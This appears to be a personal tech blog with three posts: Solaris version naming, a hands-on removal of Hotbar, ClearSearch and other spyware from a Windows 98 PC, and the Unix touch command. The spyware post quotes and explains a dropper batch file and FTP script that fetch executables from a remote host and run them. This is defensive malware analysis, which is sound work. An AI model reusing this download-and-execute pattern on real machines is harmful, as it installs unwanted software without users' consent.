Solaris Version Numbering
Sun's operating system versioning scheme has seemed confusing to me,
since the same operating system version may be referred to with different
version numbers.
An explanation of Sun's numbering scheme for Solaris can be found at
Sun Versus Linux: The x86 Smack-down where the following
explanation can be found:
After Solaris 2.6, Sun decided to change how it named each Solaris version. The
next version was Solaris 2.7, but Sun called it simply “Solaris 7”.
Solaris 8 is actually 2.8, and Solaris 9 is 2.9. They are sometimes still
referred to by the old nomenclature (i.e. 2.7), especially when dealing with
porting and software versioning.
A bit confused? I've still got more! Solaris versions are also sometimes
referred to as SunOS, and different numbering schemes apply there as well..
SunOS was the original operating system released by Sun in 1981 and is based on
BSD, where Solaris is based on SVR4 Unix (System V). The last version of SunOS
was 4.1.4, which would make Solaris 2.0 (Solaris started at 2.0) SunOS 5.0. So
Solaris 9 is also known as Solaris 2.9 and also known as SunOS 5.9.
The article by Tony Bourke also offers a comparison of Linux and Solaris.
Another good source of information on the naming of Solaris version naming
is the Wikipedia SunOS
article.
[/os/unix/solaris]
permanent link
Windows 98 System Hanging After Login
My mother-in-law told me her Windows 98 PC hangs after she enters her name
and password to log into it. She said that even if she waits a long time,
she can't get any further. Rebooting the system puts it back in the same
state.
When I tested the system, I found I could bring up the Windows Explorer
with Ctrl-Alt-Del, which showed the following tasks.
Explorer
Starter
Systray
Scanregw
I ended the Scanregw task, but that didn't help and then I couldn't even bring
up the task list again. I rebooted and logged in with my wife's userid and
password. When I brought up the task list, again I saw the same tasks, but
this time I saw "Not responding" listed after Explorer. I ended the Windows
Explorer task and then the system appeared to perform normally. However, when
I opened Windows Explorer, I saw "Finalizing installation" continually
scrolling across Windows Explorer directly beneath the address bar.
The antivirus program wasn't shown in the system tray. When I went looking
for the program with the Windows Explorer, I saw a
Hotbar folder under the Program Files folder. I've encountered problems
with this adware/spyware program on other systems and would not leave it on any
PC I support.
The company that produces this adware/spyware claims "Hotbar enhances and
personalizes your Internet & email applications" and can "make your emails
unique with hundreds of animations, backgrounds and more" and allows you
to "design & send FREE eCards from your existing email". They also state
that Hotbar will "brighten your browser with colorful images & enhance
your surfing experience with Smart Buttons!" But their "free" software comes
with an unseen price tag. This software is likely to significantly impair
the performance and stability of your system.
If you click on the Terms of
Use and License link you will find the following:
HOTBAR COLLECTS AND STORES INFORMATION ABOUT THE WEB PAGES YOU VIEW AND THE
DATA YOU ENTER IN SEARCH ENGINE SEARCH FIELDS WHILE USING THE SOFTWARE. HOTBAR
USES THIS INFORMATION TO DETERMINE WHICH ADS AND BUTTONS TO DISPLAY ON YOUR
HOTBAR TOOLBARS AND WHICH ADS TO SHOW YOUR BROWSER.
So you are subjecting yourself to "targeted" popup ads, if you install the
software.
Hotbar.com states that you can use Windows control panel Add/Remove
Programs option to rid yourself of this software by opting to remove
Outlook Tools by Hotbar, Web Browser Tools by Hotbar, and
Shopper Reports Adapter. Or you can download an uninstaller from
the company's website at
http://hotbar.com/downloads/HbUninst.exe. Instructions on how to manually
remove the software can be found at
http://www.kephyr.com/spywarescanner/library/hotbar/index.phtml. I usually
rely on
Spybot Search & Destroy
to rid systems of adware and spyware. Spybot is a free adware/spyware
detection and removal program, though you should make a donation to the
developer to ensure he can continue to maintain and developer such a
worthwhile program.
I also use
Bazooka Adware and Spyware Scanner from
Kephyr to locate adware/spyware on systems. It is also free, but
you really should consider making a
donation
to help the developer continue his work.
Bazooka Adware and Spyware Scanner does an excellent job detecting such
software, but can't automatically remove such software. However, the developer
does provide instructions on manually removing such software. I've found that
Spybot and other adware/spyware removal tools, though they disable and remove
most of the bits and pieces of adware/spyware they detect, sometimes will
still leave a few files, registry entries, etc. that Bazooka will detect.
I can then use the manual removal instructions on the Kephyr website to
remove the last remnants of the programs.
I started a Spybot Search & Destroy
scan of the system. Spybot found the following adware/spyware.
ClearSearch.Net
Comet Cursors
DSO Exploit
Hotbar
Lycos.SideSearch
Test - Browser Helper Object (BHO)
VX2/e
VX2/f
VX2/h.ABetterInternet
Interestingly, the
PestPatrol webpage
on
ClearSearch reports that "Every time the computer is started, ClearSearch
will remove the search-hijacking part of Xupiter, HuntBar/MSLink, CommonName,
NewDotNet, the iWon toolbar/search assistant and Netword." So apparently the
software will eliminate portions of competing adware/spyware.
I had Spybot remove all of the adware/spyware it found. Spybot couldn't
remove all of it immediately, so I rebooted it to let it remove the rest
of it at startup. However, the system hung again after Spybot competed
its work. I used Ctrl-Alt-Del again and saw a list similar to what I had
seen previously.
Explorer
Systray
Scanregw
Rundll32
Starter
I chose to shut down the system, but the system didn't shut down and I couldn't
bring up the task list with Ctrl-Alt-Del again. I had to power the system
off and on. When I logged in again, I didn't experience the problem with
the system hanging. But when I ran Spybot again to make sure that it wasn't
seeing any adware/spyware, it reported two registry keys still existed for
Hotbar. I had it "fix selected problems" again and then repeated the scan.
This time it reported "no immediate threats were found".
As an added precaution, I installed
Ad-aware 6.0 on the system.
Ad-aware is available in three versions. The standard version is free for
non-commercial use. If you wish to have real-time monitoring and blocking
capabilities to prevent adware/spyware being installed, purchase one of
the other versions. They are relatively inexpensive given the time and
aggravation they can spare you by preventing adware/spyware from
being installed and subsequently causing crashes, freezes, etc. on your
system.
Ad-aware reported it found 28 processes and 149 objects associated with
adware/spyware on the system. It isn't unusual for a particular adware/spyware
detection program to find adware/spyware that another program has missed or
at least some files and registry entries associated with adware/spyware that
remain even though the adware/spyware has been rendered ineffective. I've
run Spybot after running Ad-aware on systems and found it has detected things
that Ad-aware has missed. I usually run Ad-aware, Bazooka Adware and Spyware
Scanner, and Spybot Search & Destroy on systems to ensure that no
adware/spyware is left on a system. Be sure to update the programs' reference
files so that you ensure you are checking for recently detected adware/spyware
before you run checks on a system.
Ad-aware reported a number of tracking cookies, which I'm not as concerned
about, but objects associated with the adware/spyware listed below were
found as well. I'm not concerned about Ad-aware finding Alexa, since the
Alexa toolbar isn't installed. Even if a system doesn't have the Alexa
toolbar installed, you will likely see Alexa reported by Ad-aware, since
it comes bundled with Internet Explorer. The
Adware and Under-Wear - The Definitive Guide article has further
information on Alexa, as well as other adware/spyware. The article states
that in 2001 a $1.9 million fine was levied against the company
responsible for Alexa for violating users' privacy.
Alexa
ClearSearch
CometCursor
Coulomb Dialer
HotBar
VX2.BetterInternet
FavoriteMan
WinPup32
Ad-aware reported "Some objects could not be removed" and asked if I wanted to
let Ad-aware remove them after the next reboot. The only one it reported was
c:\program files\clearsearch\ie_clrsch.dll. I instructed it to
remove the object after the next reboot and then rebooted the sysem. Ad-ware
completed its check when the system booted and I reran the program yet again
for good measure. This time the program didn't find any adware/spyware,
reporting "0 New objects" were found.
There are still four items on the desktop that I believe are associated
with ClearSearch, though. The file names are as follows:
o
o.bat
ClrSchP028.exe
Calsdr.exe
The batch file o.bat contained the following lines:
if not exist C:\WINDOWSstatuslog ftp -s:o
if exist ClrSchP028.exe ClrSchP028.exe
if exist calsdr.exe calsdr.exe
The first line checks to see if the file WINDOWSstatuslog exists in
C:\. If the file doesn't exist, the File Transfer Protocol (FTP)
program that comes with windows is started. The "-s" specifies that
a script should be executed (you can see other options by typing "
ftp -h" at a command prompt). The script is a text file with the name
of the file following the colon. In this case the name of the file is
"o". After the first line is executed, the batch file will check
to see if ClrSchP028.exe and calsdr.exe exist and will execute them
if they exist. By checking for their existence first, the batch file
avoids the display of an error message by your system.
Looking at the contents of the file titled "o", I see the following:
open downloads.default-homepage-network.com
tmpacct
12345
bin
get ClrSchP028.exe
get calsdr.exe
bye
The first line tells the ftp program to open a connection to the
system downloads.default-homepage-network.com. An FTP server
will prompt for a userid and password. So the second line
transmits a userid of "tmpacct" and the following line transmits
the password "12345". On the next line, the "bin" command sets
the file transmitssion mode to use binary rather than text transmissions. That
command is needed to ensure that there is no attempt to translate end
of line markers in files transmitted. The next two "get" commands
instruct the FTP server to transmit the two programs, ClrSchP028.exe
and calsdr.exe. The last line terminates the connection to the FTP
server.
So, if the two files were received from the FTP server they will be
executed by the o.bat batch file. Looking at the ClrSchP028.exe file
with
FileAlyzer, a tool available from the developer of Spybot Search &
Destroy, which will allow one to analyze the contents of files, I see
there is a company name, Clear Search, listed in the file
(see Figure 1).
Using FileAlyzer's hex dump capability, I looked for text in the file.
I see the program will attempt to contact
sds.clrsch.com for updates (see
Figure 2).
I deleted the four ClearSearch files from the desktop by right-clicking on
them and choosing "delete".
If you have a question about whether a program is spyware you can go to
Spychecker and enter the name of the
program in its search field. The site also has links to a number of
anti-spyware tools. You can also check on a file using Kephyr's
searchable database.
I updated the Norton Antivirus 2000 virus definitions and checked the
system with that program as well. It found a Trojan on the system, which
it quarantined.
Name | Virus |
do.exe | Download.Trojan |
While I was checking the folders under C:\Program Files, I noticed
a there was a C:\Program Files\ClearSearch folder still on the
system. The only file in it, IE_ClrSch.DLL, is a 78 KB file dated 3/22/04
8:13 PM. When I tried to remove the file, I received a message that "the
specified file is being used by Windows." I ran another Ad-aware scan,
which found ClearSearch again. It reported the following for ClearSearch:
Vendor | Type | Category | Object |
ClearSearch |
Regkey |
Data Miner |
HKEY_LOCAL_MACHINE:SOFTWARE\CLRSCH |
ClearSearch |
RegValue |
Data Miner |
HKEY_CURRENT_USER:Software\Microsoft\Internet Explorer\URLSearchHooks\ |
ClearSearch |
Folder |
Data Miner |
c:\program files\ClearSearch\ |
ClearSearch |
File |
Data Miner |
c:\program files\clearsearch\ie_clrsch.dll |
When I requested Ad-aware remove the adware/spyware it found, it reported
the following:
Some objects could not be removed.
Try closing all open browser windows prior to the removal
If this does not help, reboot and run Ad-aware again.
C:\program
files\clearsearch\ie_clrsch.dll
I had two Internet Explorer windows open while I was running Ad-aware,
which might have led to the message. When I rebooted and Ad-aware ran
again, it reported it didn't detect any more adware/spyware after
it ran. But the ClearSearch folder and ie_clrsch.dll file were still on the
system.
I finally resorted to the manual removal instructions at
http://www.kephyr.com/spywarescanner/library/clearsearch.bho1/index.phtml
. I rebooted the system and hit F8 as it rebooted to obtain the
Microsoft Windows 98 Startup Menu. I then chose Safe Mode. I then
took the following steps:
- Click on Start and select Run
- Type regedit and hit enter
-
Look for the key
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000000-0000-0000-0000-000000000240}
and delete it, if found, by clicking on it to select it and then
clicking on Edit followed by Delete.
. When you click on
it, you will see "IEHooks Class" in the right pane under "Data".
-
Delete the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00000000-0000-0000-0000-000000000240}, if it exists. You will see "Clear Search" under the "Data" column in the right-hand
pane of the Registry Editor window when you select this key.
- Click on "Registry", then "Exit" to exit the registry editor.
- Delete the ClearSearch folder under the Program Files folder
- Restart the computer in normal mode
-
Start Internet Explorer, click on Tools, Internet Options,
Programs, and then click on the "Reset Web Settings button.
When asked if you want to reset your Web settings to their original
Internet Explorer defaults, click on "Yes".
References:
Alexa
-
SimplytheBest Spyware Information
ClearSearch
-
PestPatrol
-
Clearsearch Uninstall
-
Symantec
CometCursor
-
and.doxdesk.com
-
Kephyr
Coulomb Dialer
-
Kephyr
FavoriteMan
-
and.doxdesk.com
HotBar
-
'Hotbar' spyware program bedevils Windows and should be removed
By Al Fasoldt
July 20, 2003
- and.doxdesk.com
-
Kephyr
VX2
-
PC Sympathy
-
PestPatrol
Winpup32
-
Kephyr
[/security/spyware]
permanent link
Updating a File's Timestamp with Touch
You can use the Unix touch command to modify a file's timestamp.
The syntax is touch -t STAMP where the timestamp is in the form
[[CC]YY]MMDDhhmm[.ss]
CC - century, e.g. 19 for twentieth century or 20 for twenty first century
YY - year
MM - month, use 01 for January
DD - day, use leading zeroes, e.g. 01 for the first day of the month
hh - hours in 24 hour format, e.g. 13 is 1:00 P.M.
mm - minutes
ss - seconds
Note: brackets denote optional parameters.
E.g. touch -t 200402132233 myfile.txt resets the timestamp on
myfile.txt to February 13, 2004 10:33 P.M.
[/os/unix/commands]
permanent link